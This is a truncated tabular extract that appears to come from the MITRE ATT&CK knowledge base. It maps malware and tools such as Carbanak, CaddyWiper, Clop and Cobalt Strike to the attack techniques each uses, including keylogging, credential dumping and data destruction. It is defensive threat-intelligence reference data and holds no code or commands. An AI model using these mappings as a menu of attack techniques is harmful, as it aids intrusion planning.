S0137 CORESHELLmalware-- software uses T1105 Ingress Tooattack-pat technique [CORESHELL
S0137 CORESHELLmalware-- software uses T1071.003Mail Protocattack-pat technique [CORESHELL
S0137 CORESHELLmalware-- software uses T1027 Obfuscatedattack-pat technique [CORESHELL]
S0137 CORESHELLmalware-- software uses T1547.001Registry Ruattack-pat technique [CORESHELL]
S0137 CORESHELLmalware-- software uses T1218.011Rundll32 attack-pat technique [CORESHELL]
S0137 CORESHELLmalware-- software uses T1132.001Standard Eattack-pat technique [CORESHELL
S0137 CORESHELLmalware-- software uses T1573.001Symmetric attack-pat technique [CORESHELL]
S0137 CORESHELLmalware-- software uses T1082 System Inf attack-pat technique [CORESHELL]
S0137 CORESHELLmalware-- software uses T1071.001Web Protocattack-pat technique [CORESHELL]
S0527 CSPY Downtool--5256 software uses T1548.002Bypass Useattack-pat technique [CSPY Down
S0527 CSPY Downtool--5256 software uses T1553.002Code Signi attack-pat technique [CSPY Down
S0527 CSPY Downtool--5256 software uses T1070.004File Deleti attack-pat technique [CSPY Downl
S0527 CSPY Downtool--5256 software uses T1070 Indicator attack-pat technique [CSPY Downl
S0527 CSPY Downtool--5256 software uses T1105 Ingress Tooattack-pat technique [CSPY Down
S0527 CSPY Downtool--5256 software uses T1204.002Malicious Fattack-pat technique [CSPY Down
S0527 CSPY Downtool--5256 software uses T1036.004Masquerade attack-pat technique [CSPY Downl
S0527 CSPY Downtool--5256 software uses T1112 Modify Regattack-pat technique [CSPY Down
S0527 CSPY Downtool--5256 software uses T1053.005Scheduled attack-pat technique [CSPY Down
S0527 CSPY Downtool--5256 software uses T1027.002Software Pattack-pat technique [CSPY Down
S0527 CSPY Downtool--5256 software uses T1497.001System Cheattack-pat technique [CSPY Downl
S0527 CSPY Downtool--5256 software uses T1071.001Web Protocattack-pat technique [CSPY Down
S0119 Cachedumtool--c9cd software uses T1003.005Cached Dom attack-pat technique [Cachedump
S0693 CaddyWipemalware-- software uses T1485 Data Destrattack-pat technique [CaddyWipe
S0693 CaddyWipemalware-- software uses T1561.002Disk Struc attack-pat technique [CaddyWiper
S0693 CaddyWipemalware-- software uses T1083 File and Di attack-pat technique [CaddyWipe
S0693 CaddyWipemalware-- software uses T1106 Native API attack-pat technique [CaddyWiper
S0693 CaddyWipemalware-- software uses T1057 Process Di attack-pat technique [CaddyWipe
S0693 CaddyWipemalware-- software uses T1082 System Inf attack-pat technique [CaddyWipe
S0693 CaddyWipemalware-- software uses T1222.001Windows Fiattack-pat technique [CaddyWiper
S0454 Cadelspy malware-- software uses T1010 Applicatio attack-pat technique [Cadelspy](
S0454 Cadelspy malware-- software uses T1560 Archive Coattack-pat technique [Cadelspy](
S0454 Cadelspy malware-- software uses T1123 Audio Captattack-pat technique [Cadelspy](
S0454 Cadelspy malware-- software uses T1115 Clipboard attack-pat technique [Cadelspy](
S0454 Cadelspy malware-- software uses T1056.001Keyloggingattack-pat technique [Cadelspy](
S0454 Cadelspy malware-- software uses T1120 Peripheral attack-pat technique [Cadelspy](
S0454 Cadelspy malware-- software uses T1113 Screen Capattack-pat technique [Cadelspy]
S0454 Cadelspy malware-- software uses T1082 System Inf attack-pat technique [Cadelspy](
S0274 Calisto malware-- software uses T1098 Account Ma attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1560.001Archive viaattack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1217 Browser Inattack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1005 Data from attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1070.004File Deleti attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1056.002GUI Input attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1564.001Hidden Fileattack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1105 Ingress Tooattack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1555.001Keychain attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1543.001Launch Ageattack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1569.001Launchctl attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1136.001Local Acco attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1074.001Local Data attack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1036.005Match Legiattack-pat technique [Calisto](h
S0274 Calisto malware-- software uses T1016 System Netattack-pat technique [Calisto](h
S0077 CallMe malware-- software uses T1041 Exfiltratio attack-pat technique [CallMe](ht
S0077 CallMe malware-- software uses T1105 Ingress Tooattack-pat technique [CallMe](ht
S0077 CallMe malware-- software uses T1573.001Symmetric attack-pat technique [CallMe](ht
S0077 CallMe malware-- software uses T1059.004Unix Shell attack-pat technique [CallMe](ht
S0351 Cannon malware-- software uses T1041 Exfiltratio attack-pat technique [Cannon](ht
S0351 Cannon malware-- software uses T1083 File and Di attack-pat technique [Cannon](ht
S0351 Cannon malware-- software uses T1105 Ingress Tooattack-pat technique [Cannon](h
S0351 Cannon malware-- software uses T1071.003Mail Protocattack-pat technique [Cannon](h
S0351 Cannon malware-- software uses T1057 Process Di attack-pat technique [Cannon](ht
S0351 Cannon malware-- software uses T1113 Screen Capattack-pat technique [Cannon](h
S0351 Cannon malware-- software uses T1082 System Inf attack-pat technique [Cannon](h
S0351 Cannon malware-- software uses T1033 System Own attack-pat technique [Cannon](h
S0351 Cannon malware-- software uses T1124 System Timattack-pat technique [Cannon](ht
S0351 Cannon malware-- software uses T1547.004Winlogon Hattack-pat technique [Cannon](h
S0030 Carbanak malware-- software uses T1030 Data Transfattack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1070.004File Deleti attack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1056.001Keyloggingattack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1136.001Local Acco attack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1114.001Local Emailattack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1003 OS Credentattack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1027 Obfuscatedattack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1055.002Portable Exattack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1057 Process Di attack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1012 Query Regiattack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1547.001Registry Ruattack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1219 Remote Accattack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1021.001Remote Des attack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1113 Screen Capattack-pat technique [Carbanak](
S0030 Carbanak malware-- software uses T1132.001Standard Eattack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1573.001Symmetric attack-pat technique [Carbanak]
S0030 Carbanak malware-- software uses T1071.001Web Protocattack-pat technique The [Carba
S0030 Carbanak malware-- software uses T1059.003Windows Cattack-pat technique [Carbanak]
S0484 Carberp malware-- software uses T1055.004Asynchronoattack-pat technique [Carberp](
S0484 Carberp malware-- software uses T1542.003Bootkit attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1185 Browser Seattack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1056.004Credential attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1555 Credential attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1555.003Credential attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1562.001Disable or attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1055.001Dynamic-linattack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1027.013Encrypted/attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1041 Exfiltratio attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1068 Exploitatioattack-pat technique [Carberp](
S0484 Carberp malware-- software uses T1564.001Hidden Fileattack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1105 Ingress Tooattack-pat technique [Carberp](
S0484 Carberp malware-- software uses T1036.005Match Legiattack-pat technique [Carberp](
S0484 Carberp malware-- software uses T1106 Native API attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1057 Process Di attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1012 Query Regiattack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1547.001Registry Ruattack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1014 Rootkit attack-pat technique [Carberp](
S0484 Carberp malware-- software uses T1113 Screen Capattack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1518.001Security S attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1082 System Inf attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1021.005VNC attack-pat technique [Carberp](
S0484 Carberp malware-- software uses T1497 Virtualiza attack-pat technique [Carberp](h
S0484 Carberp malware-- software uses T1071.001Web Protocattack-pat technique [Carberp](h
S0335 Carbon malware-- software uses T1573.002Asymmetricattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1140 Deobfuscatattack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1055.001Dynamic-linattack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1048.003Exfiltrati attack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1074.001Local Data attack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1095 Non-Applicattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1027 Obfuscatedattack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1069 Permissionattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1057 Process Di attack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1012 Query Regiattack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1018 Remote Sysattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1053.005Scheduled attack-pat technique [Carbon](ht
S0335 Carbon malware-- software uses T1016 System Netattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1049 System Netattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1124 System Timattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1071.001Web Protocattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1102 Web Servicattack-pat technique [Carbon](h
S0335 Carbon malware-- software uses T1543.003Windows Se attack-pat technique [Carbon](ht
S0348 Cardinal R malware-- software uses T1560.002Archive viaattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1027.004Compile Aftattack-pat technique [Cardinal
S0348 Cardinal R malware-- software uses T1140 Deobfuscatattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1027.013Encrypted/attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1008 Fallback C attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1070.004File Deleti attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1083 File and Di attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1105 Ingress Tooattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1056.001Keyloggingattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1204.002Malicious Fattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1112 Modify Regattack-pat technique [Cardinal
S0348 Cardinal R malware-- software uses T1057 Process Di attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1055 Process Injattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1090 Proxy attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1012 Query Regiattack-pat technique [Cardinal
S0348 Cardinal R malware-- software uses T1547.001Registry Ruattack-pat technique [Cardinal
S0348 Cardinal R malware-- software uses T1113 Screen Capattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1573.001Symmetric attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1082 System Inf attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1033 System Own attack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1071.001Web Protocattack-pat technique [Cardinal R
S0348 Cardinal R malware-- software uses T1059.003Windows Cattack-pat technique [Cardinal
S0261 Catchamasmalware-- software uses T1010 Applicatio attack-pat technique [Catchamas
S0261 Catchamasmalware-- software uses T1115 Clipboard attack-pat technique [Catchamas]
S0261 Catchamasmalware-- software uses T1056.001Keyloggingattack-pat technique [Catchamas]
S0261 Catchamasmalware-- software uses T1074.001Local Data attack-pat technique [Catchamas]
S0261 Catchamasmalware-- software uses T1036.004Masquerade attack-pat technique [Catchamas
S0261 Catchamasmalware-- software uses T1112 Modify Regattack-pat technique [Catchamas]
S0261 Catchamasmalware-- software uses T1113 Screen Capattack-pat technique [Catchamas]
S0261 Catchamasmalware-- software uses T1016 System Netattack-pat technique [Catchamas
S0261 Catchamasmalware-- software uses T1543.003Windows Se attack-pat technique [Catchamas
S0572 Caterpillar malware--7software uses T1110 Brute Forc attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1005 Data from attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1041 Exfiltratio attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1083 File and Di attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1105 Ingress Tooattack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1069.001Local Grouattack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1112 Modify Regattack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1046 Network Seattack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1057 Process Di attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1014 Rootkit attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1082 System Inf attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1016 System Netattack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1033 System Own attack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1007 System Serattack-pat technique [Caterpilla
S0572 Caterpillar malware--7software uses T1059.003Windows Cattack-pat technique [Caterpill
S0144 ChChes malware-- software uses T1553.002Code Signi attack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1555.003Credential attack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1562.001Disable or attack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1083 File and Di attack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1105 Ingress Tooattack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1036.005Match Legiattack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1057 Process Di attack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1547.001Registry Ruattack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1132.001Standard Eattack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1573.001Symmetric attack-pat technique [ChChes](ht
S0144 ChChes malware-- software uses T1082 System Inf attack-pat technique [ChChes](h
S0144 ChChes malware-- software uses T1071.001Web Protocattack-pat technique [ChChes](h
S0631 Chaes malware-- software uses T1185 Browser Seattack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1555.003Credential attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1574.001DLL Searchattack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1140 Deobfuscatattack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1573 Encrypted attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1048 Exfiltratio attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1027.011Fileless St attack-pat technique Some versio
S0631 Chaes malware-- software uses T1105 Ingress Tooattack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1056 Input Capt attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1218.004InstallUtil attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1059.007JavaScript attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1204.002Malicious Fattack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1036.005Match Legiattack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1112 Modify Regattack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1218.007Msiexec attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1106 Native API attack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1059.006Python attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1547.001Registry Ruattack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1113 Screen Capattack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1566.001Spearphishattack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1132.001Standard Eattack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1539 Steal Web attack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1082 System Inf attack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1033 System Own attack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1221 Template Iattack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1059.005Visual Basiattack-pat technique [Chaes](htt
S0631 Chaes malware-- software uses T1071.001Web Protocattack-pat technique [Chaes](ht
S0631 Chaes malware-- software uses T1059.003Windows Cattack-pat technique [Chaes](htt
S0220 Chaos malware-- software uses T1110 Brute Forc attack-pat technique [Chaos](htt
S0220 Chaos malware-- software uses T1104 Multi-Stag attack-pat technique After initi
S0220 Chaos malware-- software uses T1573.001Symmetric attack-pat technique [Chaos](htt
S0220 Chaos malware-- software uses T1205 Traffic Signattack-pat technique [Chaos](htt
S0220 Chaos malware-- software uses T1059.004Unix Shell attack-pat technique [Chaos](htt
S0674 CharmPowmalware--7software uses T1005 Data from attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1102.001Dead Dropattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1140 Deobfuscatattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1041 Exfiltratio attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1048.003Exfiltrati attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1008 Fallback C attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1070.004File Deleti attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1083 File and Di attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1105 Ingress Tooattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1112 Modify Regattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1059.001PowerShellattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1057 Process Di attack-pat technique [CharmPower
S0674 CharmPowmalware--7software uses T1012 Query Regiattack-pat technique [CharmPower
S0674 CharmPowmalware--7software uses T1113 Screen Capattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1518 Software Dattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1132.001Standard Eattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1573.001Symmetric attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1082 System Inf attack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1016 System Netattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1049 System Netattack-pat technique [CharmPower
S0674 CharmPowmalware--7software uses T1071.001Web Protocattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1102 Web Servicattack-pat technique [CharmPowe
S0674 CharmPowmalware--7software uses T1059.003Windows Cattack-pat technique The C# imp
S0674 CharmPowmalware--7software uses T1047 Windows M attack-pat technique [CharmPowe
[Cheerscrypt](https://attack.
S1096 Cheerscrypmalware-- software uses T1486 Data Encryattack-pat technique
S1096 Cheerscrypmalware-- software uses T1083 File and Di attack-pat technique [Cheerscryp
[Cheerscrypt](https://attack.
S1096 Cheerscrypmalware-- software uses T1489 Service Stoattack-pat technique
S0107 Cherry Pickmalware--bsoftware uses T1546.010AppInit DL attack-pat technique Some varia
S0107 Cherry Pickmalware--bsoftware uses T1048.003Exfiltrati attack-pat technique [Cherry Pic
S0107 Cherry Pickmalware--bsoftware uses T1070.004File Deleti attack-pat technique Recent vers
S0020 China Chopmalware--5software uses T1005 Data from attack-pat technique [China Chop
S0020 China Chopmalware--5software uses T1083 File and Di attack-pat technique [China Cho
S0020 China Chopmalware--5software uses T1105 Ingress Tooattack-pat technique [China Cho
S0020 China Chopmalware--5software uses T1046 Network Seattack-pat technique [China Chop
S0020 China Chopmalware--5software uses T1110.001Password Gattack-pat technique [China Chop
S0020 China Chopmalware--5software uses T1027.002Software Pattack-pat technique [China Chop
S0020 China Chopmalware--5software uses T1070.006Timestompattack-pat technique [China Chop
S0020 China Chopmalware--5software uses T1071.001Web Protocattack-pat technique [China Cho
S0020 China Chopmalware--5software uses T1505.003Web Shell attack-pat technique [China Chop
S0020 China Chopmalware--5software uses T1059.003Windows Cattack-pat technique [China Cho
S1041 Chinoxy malware--0software uses T1574.002DLL Side-L attack-pat technique [Chinoxy](h
S1041 Chinoxy malware--0software uses T1140 Deobfuscatattack-pat technique The [Chinox
S1041 Chinoxy malware--0software uses T1027.013Encrypted/attack-pat technique [Chinoxy](
S1041 Chinoxy malware--0software uses T1036.005Match Legiattack-pat technique [Chinoxy](
S1041 Chinoxy malware--0software uses T1547.001Registry Ruattack-pat technique [Chinoxy](
S0667 Chrommmmalware-- software uses T1560 Archive Coattack-pat technique [Chrommme](
S0667 Chrommmmalware-- software uses T1005 Data from attack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1140 Deobfuscatattack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1027.013Encrypted/attack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1041 Exfiltratio attack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1105 Ingress Tooattack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1074.001Local Data attack-pat technique [Chrommme](
S0667 Chrommmmalware-- software uses T1106 Native API attack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1029 Scheduled attack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1113 Screen Capattack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1082 System Inf attack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1016 System Netattack-pat technique [Chrommme]
S0667 Chrommmmalware-- software uses T1033 System Own attack-pat technique [Chrommme]
S0660 Clambling malware-- software uses T1071 Applicationattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1102.002Bidirectio attack-pat technique [Clambling
S0660 Clambling malware-- software uses T1548.002Bypass Useattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1115 Clipboard attack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1574.002DLL Side-L attack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1005 Data from attack-pat technique [Clambling
S0660 Clambling malware-- software uses T1140 Deobfuscatattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1567.002Exfiltratio attack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1083 File and Di attack-pat technique [Clambling
S0660 Clambling malware-- software uses T1564.001Hidden Fileattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1056.001Keyloggingattack-pat technique [Clambling
S0660 Clambling malware-- software uses T1204.002Malicious Fattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1112 Modify Regattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1135 Network Shattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1095 Non-Applicattack-pat technique [Clambling
S0660 Clambling malware-- software uses T1027 Obfuscatedattack-pat technique The [Clamb
S0660 Clambling malware-- software uses T1059.001PowerShellattack-pat technique The [Clamb
S0660 Clambling malware-- software uses T1057 Process Di attack-pat technique [Clambling
S0660 Clambling malware-- software uses T1055.012Process Hoattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1055 Process Injattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1012 Query Regiattack-pat technique [Clambling
S0660 Clambling malware-- software uses T1547.001Registry Ruattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1113 Screen Capattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1569.002Service Ex attack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1566.001Spearphishattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1082 System Inf attack-pat technique [Clambling
S0660 Clambling malware-- software uses T1016 System Netattack-pat technique [Clambling
S0660 Clambling malware-- software uses T1033 System Own attack-pat technique [Clambling
S0660 Clambling malware-- software uses T1124 System Timattack-pat technique [Clambling
S0660 Clambling malware-- software uses T1497.003Time Basedattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1125 Video Captattack-pat technique [Clambling]
S0660 Clambling malware-- software uses T1071.001Web Protocattack-pat technique [Clambling
S0660 Clambling malware-- software uses T1059.003Windows Cattack-pat technique [Clambling
S0660 Clambling malware-- software uses T1543.003Windows Se attack-pat technique [Clambling]
S0611 Clop malware-- software uses T1553.002Code Signi attack-pat technique [Clop](http
S0611 Clop malware-- software uses T1486 Data Encryattack-pat technique [Clop](http
S0611 Clop malware-- software uses T1140 Deobfuscatattack-pat technique [Clop](http
S0611 Clop malware-- software uses T1562.001Disable or attack-pat technique [Clop](http
S0611 Clop malware-- software uses T1083 File and Di attack-pat technique [Clop](http
S0611 Clop malware-- software uses T1490 Inhibit Sy attack-pat technique [Clop](htt
S0611 Clop malware-- software uses T1112 Modify Regattack-pat technique [Clop](http
S0611 Clop malware-- software uses T1218.007Msiexec attack-pat technique [Clop](http
S0611 Clop malware-- software uses T1106 Native API attack-pat technique [Clop](htt
S0611 Clop malware-- software uses T1135 Network Shattack-pat technique [Clop](htt
S0611 Clop malware-- software uses T1057 Process Di attack-pat technique [Clop](http
S0611 Clop malware-- software uses T1518.001Security S attack-pat technique [Clop](http
S0611 Clop malware-- software uses T1489 Service Stoattack-pat technique [Clop](http
S0611 Clop malware-- software uses T1027.002Software Pattack-pat technique [Clop](http
S0611 Clop malware-- software uses T1614.001System Lanattack-pat technique [Clop](htt
S0611 Clop malware-- software uses T1497.003Time Basedattack-pat technique [Clop](htt
S0611 Clop malware-- software uses T1059.003Windows Cattack-pat technique [Clop](htt
S0054 CloudDukemalware-- software uses T1102.002Bidirectio attack-pat technique One varian
S0054 CloudDukemalware-- software uses T1105 Ingress Tooattack-pat technique [CloudDuke
S0054 CloudDukemalware-- software uses T1071.001Web Protocattack-pat technique One varian
S0154 Cobalt Stri malware--asoftware uses T1573.002Asymmetricattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1197 BITS Jobs attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1185 Browser Seattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1548.002Bypass Useattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1553.002Code Signi attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1071.004DNS attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1030 Data Transfattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1005 Data from attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1140 Deobfuscatattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1562.001Disable or attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1021.003Distribute attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1087.002Domain Acattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1078.002Domain Acattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1090.004Domain Froattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1069.002Domain Grattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1055.001Dynamic-linattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1203 Exploitatioattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1068 Exploitatioattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1071.002File Transf attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1083 File and Di attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1027.005Indicator attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1105 Ingress Tooattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1090.001Internal Prattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1059.007JavaScript attack-pat technique The [Cobalt
S0154 Cobalt Stri malware--asoftware uses T1056.001Keyloggingattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1003.001LSASS Memattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1078.003Local Acco attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1069.001Local Grouattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1134.003Make and attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1112 Modify Regattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1106 Native API attack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1046 Network Seattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1135 Network Shattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1095 Non-Applicattack-pat technique [Cobalt Str
